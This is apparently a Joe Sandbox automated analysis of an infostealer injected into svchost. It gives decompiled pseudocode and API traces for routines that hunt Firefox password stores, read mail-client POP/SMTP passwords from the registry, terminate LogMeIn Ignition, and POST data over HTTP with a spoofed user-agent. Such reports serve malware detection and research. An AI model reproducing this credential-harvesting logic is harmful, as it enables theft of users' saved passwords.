LocalAlloc 9560->9564 9563 10001871 LocalFree 9561->9563 9566 10006bec LocalAlloc 9562->9566 9565 10009764 9563->9565 9564->9562 9567 10001871 LocalFree 9565->9567 9570 10009721 9566->9570 9568 1000976c 9567->9568 9569 10001871 LocalFree 9568->9569 9569->9550 9570->9561 9571 10001584 lstrlenA 9570->9571 9572 10009746 9571->9572 9573 10001584 lstrlenA 9572->9573 9574 10009751 9573->9574 9575 10001584 lstrlenA 9574->9575 9575->9561 9576->9553 9274 10002bb4 9275 10002bc2 9274->9275 9277 10002bda 9275->9277 9278 10002941 9275->9278 9279 10002951 9278->9279 9280 10002963 9278->9280 9279->9280 9281 1000296a LookupPrivilegeValueA 9279->9281 9280->9275 9282 100029e0 9281->9282 9283 10002986 GetCurrentProcess OpenProcessToken 9281->9283 9286 100029e7 CloseHandle 9282->9286 9287 100029ef 9282->9287 9284 100029c7 AdjustTokenPrivileges 9283->9284 9285 1000299e 9283->9285 9284->9282 9285->9284 9286->9287 9287->9275 9288 100024f5 9289 10002491 2 API calls 9288->9289 9290 100024fa 9289->9290 9291 10002491 2 API calls 9290->9291 9292 10002509 9291->9292 9293 10002491 2 API calls 9292->9293 9294 10002518 9293->9294 9295 10002491 2 API calls 9294->9295 9296 10002527 9295->9296 9297 10002491 2 API calls 9296->9297 9298 10002536 9297->9298 9299 10002491 2 API calls 9298->9299 9300 10002545 9299->9300 9301 10002491 2 API calls 9300->9301 9302 10002554 9301->9302 9303 10002491 2 API calls 9302->9303 9304 10002563 9303->9304 9305 10002491 2 API calls 9304->9305 9306 10002572 9305->9306 9307 10002491 2 API calls 9306->9307 9308 10002581 9307->9308 9310 1000b836 SetUnhandledExceptionFilter 9311 1000b850 9310->9311 9312 1000b888 9311->9312 9313 1000b882 RevertToSelf 9311->9313 9318 1000b45b 9312->9318 9313->9312 9315 1000b897 9324 1000b56a 9315->9324 9317 1000b89c 9319 1000b472 9318->9319 9322 1000b474 9318->9322 9319->9315 9320 1000b487 9320->9315 9321 10002a83 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 9321->9322 9322->9320 9322->9321 9342 10001888 LocalAlloc 9322->9342 9325 1000b582 9324->9325 9330 1000b584 9324->9330 9325->9317 9326 1000b597 9326->9317 9327 1000b741 9327->9317 9328 1000b5b6 lstrcmpiA 9329 1000b5cd LogonUserA 9328->9329 9328->9330 9329->9330 9330->9326 9330->9327 9330->9328 9330->9329 9331 1000b67c LoadUserProfileA 9330->9331 9332 100029f6 3 API calls 9330->9332 9335 1000b6e1 ImpersonateLoggedOnUser 9330->9335 9336 10001871 LocalFree 9330->9336 9337 1000b712 UnloadUserProfile 9330->9337 9338 1000b71d CloseHandle 9330->9338 9339 1000b659 LogonUserA 9330->9339 9340 1000b702 9330->9340 9341 1000b6fc RevertToSelf 9330->9341 9331->9330 9333 1000b5fb lstrlenA LCMapStringA 9332->9333 9333->9330 9334 1000b621 LogonUserA 9333->9334 9334->9330 9335->9330 9336->9330 9337->9338 9338->9330 9339->9330 9339->9331 9340->9330 9341->9340 9342->9322

                                                                                                                                        Executed Functions

                                                                                                                                        Function 10007241, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 187filestringUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 21 10007241-10007259 22 10007260 21->22 23 1000725b-1000725e 21->23 25 100074ee-100074fa call 10001871 22->25 23->22 24 10007265-1000726f call 10002582 23->24 30 10007280-10007288 call 10001db1 24->30 31 10007271-1000727e call 10001db1 24->31 35 1000728d-100072bd call 1000189f FindFirstFileA 30->35 31->35 35->25 38 100072c3-100072cf 35->38 39 100072d5-100072e5 lstrcmpiA 38->39 40 10007358-10007368 38->40 41 100072e7 39->41 42 100072ec-10007302 lstrcmpiA 39->42 43 100073b0-100073c2 StrStrIA 40->43 44 1000736a-1000737c StrStrIA 40->44 45 100074c9-100074dd FindNextFileA 41->45 46 10007304 42->46 47 10007309-10007313 call 10002582 42->47 50 100073f2-10007400 lstrlenA 43->50 51 100073c4-100073ed call 10001db1 call 10001e05 call 10006ce9 call 10001871 43->51 48 100073ab 44->48 49 1000737e-100073a6 call 10001db1 call 10001e05 call 10004064 call 10001871 44->49 45->38 57 100074e3-100074e9 FindClose 45->57 46->45 67 10007324-10007329 call 10001db1 47->67 68 10007315-10007322 call 10001db1 47->68 48->45 49->48 55 10007402-10007412 50->55 56 10007419-1000742b StrStrIA 50->56 51->50 55->56 61 10007414 55->61 62 1000745b-10007491 StrStrIA * 3 56->62 63 1000742d-10007456 call 10001db1 call 10001e05 call 100070ca call 10001871 56->63 57->25 66 1000749b-100074c4 call 10001db1 call 10001e05 call 10006d74 call 10001871 61->66 65 10007493-10007495 62->65 62->66 63->62 65->66 72 10007497-10007499 65->72 66->45 82 1000732e-10007349 call 10001e05 call 10007241 67->82 68->82 72->45 72->66 97 1000734e-10007353 call 10001871 82->97 97->45
                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                        			E10007241(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t58;
				signed int _t60;
				CHAR* _t62;
				void* _t66;
				char* _t69;
				int _t71;
				char* _t72;
				char* _t76;
				int _t83;
				int _t85;
				int _t88;
				signed int _t90;
				void* _t92;
				char* _t105;
				signed int _t111;
				signed int* _t112;
				signed int _t113;

				_t111 = __ecx;
				_v332 = 0;
				_t58 = _a16;
				if(_t58 == 0 ||  *_t58 == 0) {
					L33:
					return E10001871(_v332);
				} else {
					_t60 = E10002582(_a16);
					__eflags = _t60;
					if(_t60 != 0) {
						_t62 = E10001DB1(_a16, "*.*");
					} else {
						_t62 = E10001DB1(_a16, "\*.*");
					}
					_v332 = _t62;
					E1000189F( &_v324, 0x13e);
					_t66 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t66;
					__eflags = _t66 + 1;
					if(_t66 + 1 != 0) {
						do {
							_t112 =  &_v324;
							__eflags =  *_t112 & 0x00000010;
							if(( *_t112 & 0x00000010) == 0) {
								_v336 =  &(_t112[0xb]);
								__eflags =  *0x10010155 - 3;
								if( *0x10010155 != 3) {
									_t69 = StrStrIA(_v336, "signons.sqlite");
									__eflags = _t69;
									if(_t69 != 0) {
										E10006CE9(__eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
										E10001871(_t102);
									}
									_t71 = lstrlenA(_v336);
									__eflags = _t71 - 2;
									if(_t71 < 2) {
										L25:
										_t72 = StrStrIA(_v336, "logins.json");
										__eflags = _t72;
										if(_t72 != 0) {
											E100070CA(_t111, __eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
											E10001871(_t98);
										}
										_push(StrStrIA(_v336, "signons.txt"));
										_push(StrStrIA(_v336, "signons2.txt"));
										_t76 = StrStrIA(_v336, "signons3.txt");
										_pop(_t113);
										_pop(_t111);
										__eflags = _t76;
										if(_t76 == 0) {
											__eflags = _t113;
											if(_t113 != 0) {
												goto L30;
											}
											_t111 = _t111;
											__eflags = _t111;
											if(_t111 == 0) {
												goto L31;
											}
										}
										goto L30;
									} else {
										__eflags =  *((short*)( &(_v336[_t71]) - 2)) - 0x732e;
										if( *((short*)( &(_v336[_t71]) - 2)) != 0x732e) {
											goto L25;
										}
										L30:
										E10006D74(__eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
										E10001871(_t79);
										goto L31;
									}
								}
								_t105 = StrStrIA(_v336, "prefs.js");
								__eflags = _t105;
								if(_t105 != 0) {
									E10004064(_a4, E10001E05(E10001DB1(_a16, "\\"), _v336), 0xbeef0001);
									E10001871(_t108);
								}
								goto L31;
							}
							_t85 = lstrcmpiA(0x1000f8fd,  &(_t112[0xb]));
							__eflags = _t85;
							if(_t85 != 0) {
								_t88 = lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName));
								__eflags = _t88;
								if(_t88 != 0) {
									_t90 = E10002582(_a16);
									__eflags = _t90;
									if(_t90 != 0) {
										_t92 = E10001DB1(_a16, 0);
									} else {
										_t92 = E10001DB1(_a16, "\\");
									}
									E10007241(_t111, _a4, _a8, _a12, E10001E05(_t92,  &( &_v324->cFileName))); // executed
									E10001871(_t93);
								}
							}
							L31:
							_t83 = FindNextFileA(_v328,  &_v324); // executed
							__eflags = _t83;
						} while (_t83 != 0);
						FindClose(_v328); // executed
					}
					goto L33;
				}
			}
























                                                                                                                                        0x10007241
                                                                                                                                        0x1000724a
                                                                                                                                        0x10007257
                                                                                                                                        0x10007259
                                                                                                                                        0x100074ee
                                                                                                                                        0x100074fa
                                                                                                                                        0x10007265
                                                                                                                                        0x10007268
                                                                                                                                        0x1000726d
                                                                                                                                        0x1000726f
                                                                                                                                        0x10007288
                                                                                                                                        0x10007271
                                                                                                                                        0x10007279
                                                                                                                                        0x10007279
                                                                                                                                        0x1000728d
                                                                                                                                        0x1000729f
                                                                                                                                        0x100072b1
                                                                                                                                        0x100072b6
                                                                                                                                        0x100072bc
                                                                                                                                        0x100072bd
                                                                                                                                        0x100072c3
                                                                                                                                        0x100072c3
                                                                                                                                        0x100072c9
                                                                                                                                        0x100072cf
                                                                                                                                        0x1000735b
                                                                                                                                        0x10007361
                                                                                                                                        0x10007368
                                                                                                                                        0x100073bb
                                                                                                                                        0x100073c0
                                                                                                                                        0x100073c2
                                                                                                                                        0x100073e8
                                                                                                                                        0x100073ed
                                                                                                                                        0x100073ed
                                                                                                                                        0x100073f8
                                                                                                                                        0x100073fd
                                                                                                                                        0x10007400
                                                                                                                                        0x10007419
                                                                                                                                        0x10007424
                                                                                                                                        0x10007429
                                                                                                                                        0x1000742b
                                                                                                                                        0x10007451
                                                                                                                                        0x10007456
                                                                                                                                        0x10007456
                                                                                                                                        0x1000746b
                                                                                                                                        0x1000747c
                                                                                                                                        0x10007488
                                                                                                                                        0x1000748d
                                                                                                                                        0x1000748e
                                                                                                                                        0x1000748f
                                                                                                                                        0x10007491
                                                                                                                                        0x10007493
                                                                                                                                        0x10007495
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10007497
                                                                                                                                        0x10007497
                                                                                                                                        0x10007499
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10007499
                                                                                                                                        0x00000000
                                                                                                                                        0x10007402
                                                                                                                                        0x1000740d
                                                                                                                                        0x10007412
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000749b
                                                                                                                                        0x100074bf
                                                                                                                                        0x100074c4
                                                                                                                                        0x00000000
                                                                                                                                        0x100074c4
                                                                                                                                        0x10007400
                                                                                                                                        0x10007375
                                                                                                                                        0x1000737a
                                                                                                                                        0x1000737c
                                                                                                                                        0x100073a1
                                                                                                                                        0x100073a6
                                                                                                                                        0x100073a6
                                                                                                                                        0x00000000
                                                                                                                                        0x100073ab
                                                                                                                                        0x100072de
                                                                                                                                        0x100072e3
                                                                                                                                        0x100072e5
                                                                                                                                        0x100072fb
                                                                                                                                        0x10007300
                                                                                                                                        0x10007302
                                                                                                                                        0x1000730c
                                                                                                                                        0x10007311
                                                                                                                                        0x10007313
                                                                                                                                        0x10007329
                                                                                                                                        0x10007315
                                                                                                                                        0x1000731d
                                                                                                                                        0x1000731d
                                                                                                                                        0x10007349
                                                                                                                                        0x1000734e
                                                                                                                                        0x1000734e
                                                                                                                                        0x10007302
                                                                                                                                        0x100074c9
                                                                                                                                        0x100074d6
                                                                                                                                        0x100074db
                                                                                                                                        0x100074db
                                                                                                                                        0x100074e9
                                                                                                                                        0x100074e9
                                                                                                                                        0x00000000
                                                                                                                                        0x100072bd

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 100072B1
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 100072DE
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 100072FB
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,logins.json,?,?,signons.sqlite,00000000,?), ref: 100074D6
                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,logins.json,?,?,signons.sqlite,00000000), ref: 100074E9
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*$logins.json$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                        • API String ID: 3040542784-2271207088
                                                                                                                                        • Opcode ID: 6cf854818f28cac10bb1caf6164baf92943aa95b4d27f9d6e031be1e0cb0c29e
                                                                                                                                        • Instruction ID: af118ac29e4605c55e8ebb5d1e7de07e878cf17fe34cc356127bacf430de975d
                                                                                                                                        • Opcode Fuzzy Hash: 6cf854818f28cac10bb1caf6164baf92943aa95b4d27f9d6e031be1e0cb0c29e
                                                                                                                                        • Instruction Fuzzy Hash: 4161207590110ABAFF52DF60DC46EEE7A66FF043C0F148091F90CA5069DB39EEA0AB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02442250, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 182stringnetworkUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 103 2442250-24422a9 call 24414a0 lstrlenA 106 24422b8-24422cc InternetCrackUrlA 103->106 107 24422ab-24422b5 lstrlenA 103->107 108 24422d5-24422d9 106->108 109 24422ce-24422d0 106->109 107->106 111 24422e2-24422e6 108->111 112 24422db 108->112 110 2442494-2442497 109->110 113 24422f5-2442301 call 2441ea0 111->113 114 24422e8-24422ec 111->114 112->111 118 2442303-2442305 113->118 119 244230a-244231d 113->119 114->113 115 24422ee-24422f0 114->115 115->110 118->110 120 244231f-2442328 119->120 121 244232b-2442352 InternetConnectA 119->121 120->121 122 2442354-2442356 121->122 123 244235b-2442387 HttpOpenRequestA 121->123 122->110 124 2442389-2442395 InternetCloseHandle 123->124 125 244239a-244239e 123->125 124->110 126 24423a0-24423d2 InternetQueryOptionA InternetSetOptionA 125->126 127 24423d8-2442401 HttpSendRequestA 125->127 126->127 128 2442403-244242a HttpQueryInfoA 127->128 129 244246e-2442489 InternetCloseHandle * 2 127->129 128->129 130 244242c-2442430 128->130 131 2442492 129->131 132 244248b-2442490 129->132 130->129 133 2442432-244244d InternetReadFile 130->133 131->110 132->110 134 2442465-2442468 133->134 135 244244f-2442455 133->135 134->129 135->134 136 2442457-2442463 135->136 136->129
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02442250(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				void* _v8;
				void* _v12;
				signed int _v16;
				void _v20;
				signed short _v24;
				void _v28;
				int _v32;
				void* _v36;
				int _v40;
				long _v44;
				long _v48;
				int _v52;
				intOrPtr _v64;
				char* _v68;
				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				int _t85;
				int _t93;

				E024414A0( &_v112, 0, 0x3c);
				_v112 = 0x3c;
				_v96 =  &_v372;
				_v92 = 0x104;
				_v68 =  &_v632;
				_v64 = 0x104;
				_v32 = 0;
				_v52 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
				if(_a8 != 0) {
					_v32 = lstrlenA(_a8);
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
					if(_v100 == 0) {
						_v100 = 3;
					}
					if(_v100 == 3 || _v100 == 4) {
						_v36 = E02441EA0();
						if(_v36 != 0) {
							_v24 = _v88;
							_v16 = 0x84080100;
							if(_v100 == 4) {
								_v16 = _v16 | 0x00803000;
							}
							_v12 = InternetConnectA(_v36,  &_v372, _v24 & 0x0000ffff, 0, 0, 3, 0, 0);
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x2447048, _v16, 0);
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v48 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v20,  &_v48);
										_v20 = _v20 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v20, 4);
									}
									_t85 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v52, _a8, _v32); // executed
									_v40 = _t85;
									_v28 = 0;
									if(_v40 == 1) {
										_v44 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v44, 0);
										if(_v28 == 0xc8 && _a12 != 0) {
											_t93 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
											if(_t93 == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0;
											}
										}
									}
									InternetCloseHandle(_v8); // executed
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) {
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}


























                                                                                                                                        0x02442261
                                                                                                                                        0x02442269
                                                                                                                                        0x02442276
                                                                                                                                        0x02442279
                                                                                                                                        0x02442286
                                                                                                                                        0x02442289
                                                                                                                                        0x02442290
                                                                                                                                        0x024422a2
                                                                                                                                        0x024422a9
                                                                                                                                        0x024422b5
                                                                                                                                        0x024422b5
                                                                                                                                        0x024422cc
                                                                                                                                        0x024422d9
                                                                                                                                        0x024422db
                                                                                                                                        0x024422db
                                                                                                                                        0x024422e6
                                                                                                                                        0x024422fa
                                                                                                                                        0x02442301
                                                                                                                                        0x0244230e
                                                                                                                                        0x02442312
                                                                                                                                        0x0244231d
                                                                                                                                        0x02442328
                                                                                                                                        0x02442328
                                                                                                                                        0x0244234b
                                                                                                                                        0x02442352
                                                                                                                                        0x02442380
                                                                                                                                        0x02442387
                                                                                                                                        0x0244239e
                                                                                                                                        0x024423a0
                                                                                                                                        0x024423b5
                                                                                                                                        0x024423c3
                                                                                                                                        0x024423d2
                                                                                                                                        0x024423d2
                                                                                                                                        0x024423ed
                                                                                                                                        0x024423f3
                                                                                                                                        0x024423f6
                                                                                                                                        0x02442401
                                                                                                                                        0x02442403
                                                                                                                                        0x0244241d
                                                                                                                                        0x0244242a
                                                                                                                                        0x02442445
                                                                                                                                        0x0244244d
                                                                                                                                        0x02442468
                                                                                                                                        0x02442457
                                                                                                                                        0x0244245f
                                                                                                                                        0x0244245f
                                                                                                                                        0x0244244d
                                                                                                                                        0x0244242a
                                                                                                                                        0x02442472
                                                                                                                                        0x0244247c
                                                                                                                                        0x02442489
                                                                                                                                        0x00000000
                                                                                                                                        0x0244248b
                                                                                                                                        0x00000000
                                                                                                                                        0x0244248b
                                                                                                                                        0x02442489
                                                                                                                                        0x0244238d
                                                                                                                                        0x00000000
                                                                                                                                        0x02442354
                                                                                                                                        0x00000000
                                                                                                                                        0x02442354
                                                                                                                                        0x02442352
                                                                                                                                        0x00000000
                                                                                                                                        0x024422ee
                                                                                                                                        0x00000000
                                                                                                                                        0x024422ee
                                                                                                                                        0x024422e6
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 0244229C
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024422AF
                                                                                                                                          • Part of subcall function 02441EA0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 02441EB9
                                                                                                                                        • InternetCrackUrlA.WININET(00000001,00000000,00000000,0000003C), ref: 024422C4
                                                                                                                                        • InternetConnectA.WININET(00000000,?,0283CB28,00000000,00000000,00000003,00000000,00000000), ref: 02442345
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$lstrlen$ConnectCrackOpen
                                                                                                                                        • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                        • API String ID: 4167639401-2842678110
                                                                                                                                        • Opcode ID: 862db2d1399a5e6c6327f366533fd46db540878a7e3b980871ca5646020905d1
                                                                                                                                        • Instruction ID: 477b391954daeddaba9c8f7d255a926f514364c158ad85ee0bd1edc04dc1286b
                                                                                                                                        • Opcode Fuzzy Hash: 862db2d1399a5e6c6327f366533fd46db540878a7e3b980871ca5646020905d1
                                                                                                                                        • Instruction Fuzzy Hash: E1714F75D00219EFEB14CFA0C849BEEB7B5FB48705F108559FA05AB280DBB49A94CF60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000AF31, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 75processsynchronizationUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000AF31() {
				void* _t2;

				 *((intOrPtr*)(_t2 - 0x12c)) = 0x128;
			}




                                                                                                                                        0x1000af31

                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000AF3F
                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 1000AF5C
                                                                                                                                        • StrStrIA.SHLWAPI(?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF71
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF84
                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000,00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF95
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF9D
                                                                                                                                        • Process32Next.KERNEL32 ref: 1000AFAF
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 1000AFBC
                                                                                                                                        • CreateMutexA.KERNEL32(?,00000001,Local\mtxLogMeInIgnition.IgnitionMutex), ref: 1000AFFF
                                                                                                                                        • CreateProcessA.KERNEL32 ref: 1000B042
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess$CloseHandleProcess32$FirstMutexNextOpenSnapshotTerminateToolhelp32
                                                                                                                                        • String ID: D$LMIIgnition.exe$Local\mtxLogMeInIgnition.IgnitionMutex$cmd /K
                                                                                                                                        • API String ID: 2499566100-1314236455
                                                                                                                                        • Opcode ID: f12d1455fa970ffafe11a4fbe45f8ea2f455555ead75f3599e78d725217e9042
                                                                                                                                        • Instruction ID: 10dda9514106c42c136323d331f6baabf7aa41eb36a0f51c0990b8a4397cd6d0
                                                                                                                                        • Opcode Fuzzy Hash: f12d1455fa970ffafe11a4fbe45f8ea2f455555ead75f3599e78d725217e9042
                                                                                                                                        • Instruction Fuzzy Hash: 53211DB5A50618AAFF21DBA0CD42FED76B8EF04780F5001D1B318B50D6DBB5AF948B15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000A34F, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000A34F(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				char _v2100;
				intOrPtr _v2104;
				intOrPtr _v2108;
				char _v2112;
				intOrPtr _v2116;
				intOrPtr _v2120;
				char _v2124;
				long _t93;
				long _t94;

				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t94 = _t93;
				if(_t94 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064);
						_v2072 = E10001D2A(_a4, _v2068, "EmailAddress", 0);
						_v2076 = E10001D2A(_a4, _v2068, "Technology", 0);
						_v2080 = E10001D2A(_a4, _v2068, "PopServer", 0);
						_v2084 = E10001D2A(_a4, _v2068, "PopPort",  &_v2088);
						_v2092 = E10001D2A(_a4, _v2068, "PopAccount", 0);
						_v2096 = E10001D2A(_a4, _v2068, "PopPassword",  &_v2100);
						_v2104 = E10001D2A(_a4, _v2068, "SmtpServer", 0);
						_v2108 = E10001D2A(_a4, _v2068, "SmtpPort",  &_v2112);
						_v2116 = E10001D2A(_a4, _v2068, "SmtpAccount", 0);
						_v2120 = E10001D2A(_a4, _v2068, "SmtpPassword",  &_v2124);
						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
							E10001522(_a12, 0xbeef0000);
							E10001584(_a12, _v2072);
							E10001584(_a12, _v2076);
							E10001584(_a12, _v2080);
							E10001558(_a12, _v2084, _v2088);
							E10001584(_a12, _v2092);
							E10001558(_a12, _v2096, _v2100);
							E10001584(_a12, _v2104);
							E10001558(_a12, _v2108, _v2112);
							E10001584(_a12, _v2116);
							E10001558(_a12, _v2120, _v2124);
						}
						E1000A34F(_a4, _v2068, _a12);
						E10001871(_v2068);
						E10001871(_v2072);
						E10001871(_v2076);
						E10001871(_v2080);
						E10001871(_v2084);
						E10001871(_v2092);
						E10001871(_v2096);
						E10001871(_v2104);
						E10001871(_v2108);
						E10001871(_v2116);
						E10001871(_v2120);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t94;
			}
























                                                                                                                                        0x1000a362
                                                                                                                                        0x1000a367
                                                                                                                                        0x1000a369
                                                                                                                                        0x1000a36f
                                                                                                                                        0x1000a376
                                                                                                                                        0x1000a376
                                                                                                                                        0x1000a39d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a3c0
                                                                                                                                        0x1000a3db
                                                                                                                                        0x1000a3f6
                                                                                                                                        0x1000a411
                                                                                                                                        0x1000a431
                                                                                                                                        0x1000a44c
                                                                                                                                        0x1000a46c
                                                                                                                                        0x1000a487
                                                                                                                                        0x1000a4a7
                                                                                                                                        0x1000a4c2
                                                                                                                                        0x1000a4e2
                                                                                                                                        0x1000a4ef
                                                                                                                                        0x1000a513
                                                                                                                                        0x1000a521
                                                                                                                                        0x1000a52f
                                                                                                                                        0x1000a53d
                                                                                                                                        0x1000a551
                                                                                                                                        0x1000a55f
                                                                                                                                        0x1000a573
                                                                                                                                        0x1000a581
                                                                                                                                        0x1000a595
                                                                                                                                        0x1000a5a3
                                                                                                                                        0x1000a5b7
                                                                                                                                        0x1000a5b7
                                                                                                                                        0x1000a5c8
                                                                                                                                        0x1000a5d3
                                                                                                                                        0x1000a5de
                                                                                                                                        0x1000a5e9
                                                                                                                                        0x1000a5f4
                                                                                                                                        0x1000a5ff
                                                                                                                                        0x1000a60a
                                                                                                                                        0x1000a615
                                                                                                                                        0x1000a620
                                                                                                                                        0x1000a62b
                                                                                                                                        0x1000a636
                                                                                                                                        0x1000a641
                                                                                                                                        0x1000a646
                                                                                                                                        0x1000a646
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a651
                                                                                                                                        0x1000a657

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A362
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A396
